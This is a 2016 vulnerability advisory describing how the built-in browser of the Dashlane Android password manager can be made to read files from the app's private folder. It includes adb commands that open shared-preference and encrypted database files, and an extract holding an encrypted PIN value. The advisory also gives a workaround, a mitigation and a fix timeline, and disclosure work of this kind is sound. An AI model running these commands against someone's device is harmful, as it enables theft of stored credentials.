SIK-2016-028


Title:

Read Private Data From App Folder in Dashlane Password Manager

Report ID

SIK-2016-028

Summary:

  • Vendor: Dashlane
  • Product: Dashlane Password Manager
  • Affected Version: Version Code=1378, Version Name=“4.3.3.1378-armeabi-v7a“
  • Severity: medium-high
  • Short summary:
    The Dashlane password manager implements an own browser. This browser contains an implementation flaw wich allows local app folder read access without root permission. An attacker can abuse this vulnerability to read out sensitive information from the local app folder.

Details:

The dashlane browser is part of the dashlane password manager. The browser runs in the same context as the password manager. The URI file:// prefix allows local file access. Therewith a local attacker with physical access (evil maid attacker) can escape the application sandboxing and access files of the local dashlane app folder. The attacker can read out for instance the shared preferences files. If the user has activated the convenience function (for password access without master password), the encrypted PIN is stored in the shared preference file. The name of the file can be derived from the email address (shown by default in the login view).

echo -n 'contact@team-sik.org' | md5sum -> 53ab91f5c7161b6d83da0591584af294
-
adb shell am start -n com.dashlane/com.dashlane.android.browser.BrowserActivity -a android.intent.action.VIEW -d file:///data/data/com.dashlane/shared_prefs/53ab91f5c7161b6d83da0591584af294.xml

or

adb shell am start -n com.dashlane/com.dashlane.android.browser.BrowserActivity -a android.intent.action.VIEW -d file:///data/data/com.dashlane/shared_prefs/com.dashlane_preferences.xml

Extract of the com.dashlane_preferences.xml file:


<boolean name="9e907907d6f425ba97f7203533ea1204" value="true"/>
<string name="edbbbc9eb6fe5b240cf4d8a084d9ef0a">PLAYSTORE</string>
<boolean name="9e7dbf400f05775f556fd2b442cdc557" value="true"/>
<int name="2f489516ce7edc99ef89d88ce9f3ffa1" value="0"/>
<boolean name="bcffc08558d146de09adIb131cc0e9fc" value="true"/>
<long name="credentials_timestamp" value="1474018940377"/>
<string name="2e5d83a3dfa8ef34ca$131d20f9dad51" />
<long name="3164a9674a6ff29071c3d43f068caaed" value="1474018411304"/>
<string name="d2d8¢0¢b85be1ce1b6902fac17be5b16">
NBDBUSbc1c+nTKCszzpjZqoerErdeUKlanMV7C1LVOflzD/j32tHUQdr361HL4yuRASVAHb/6t3Hq20jCritSAQAs
</string>

On Android version less than Android 5 it is also possible to read binary files out of the app folder, like the encrypted database. The database filenames are derived from string values, see:

md5(“application_analysis”).aes
md5(“application_usagelogs”).aes
md5(“usagelogs”).aes
md5($user_email).aes
adb shell am start -n com.dashlane/com.dashlane.android.browser.BrowserActivity -a android.intent.action.VIEW -d file:///data/data/com.dashlane/databases/53ab91f5c7161b6d83da0591584af294.aes

Besides database theft it would be possible to read the browser (WebView) cache folder and cookie
folder/store. Depending of the containing content an attacker can steal sensitive information and/or session data.

Workaround

Setting the phone lock (PIN, pattern or password) will also help against physical attacker access (evil maid attack).

Suggested Mitigation

The browser should not allow file access.

Timeline

  • 2016-09-23 Vulnerability Discovered
  • 2016-09-26 Vulnerability Reported
  • 2016-10-25 Vulnerability Fixed